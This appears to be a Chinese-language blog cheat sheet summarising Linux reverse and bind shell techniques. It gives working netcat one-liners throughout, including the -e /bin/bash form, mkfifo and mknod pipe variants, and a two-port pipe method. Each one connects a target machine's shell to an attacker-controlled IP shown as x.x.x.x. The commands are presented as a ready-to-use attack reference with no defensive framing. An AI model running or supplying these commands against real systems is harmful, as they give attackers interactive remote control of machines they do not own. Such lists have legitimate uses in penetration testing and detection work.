Linux反弹Shell总结

反弹姿势

1、NC正向反弹

靶机:

nc -lvvp 靶机端口 -e /bin/sh

攻击机:

nc 靶机ip 靶机端口

2、NC反向反弹

(1)、可使用-e参数:

靶机:

nc x.x.x.x 8888 -e /bin/bash 

攻击机:

nc -lvvp 8888

(2)、NC,无-e参数反弹shell

有些版本的NC可能不支持-e选项,不能使用-e,则:

方法一:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc x.x.x.x 8888 >/tmp/f

方法二:

mknod backpipe p; nc x.x.x.x 8888 0<backpipe | /bin/bash 1>backpipe 2>backpipe

方法三:利用管道符直接反弹:

攻击者主机上打开两个终端分别执行监听:

nc -nvlp 6666
nc -nvlp 7777

靶机上执行连接:

nc x.x.x.x 6666|/bin/bash|x.x.x.x 7777

监听两个端口分别用来输入和输出,其中x.x.x.x均为攻击者ip,反弹shell成功后,在监听6666端口的终端中执行命令可以在另一个终端中看到命令执行结果。

  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值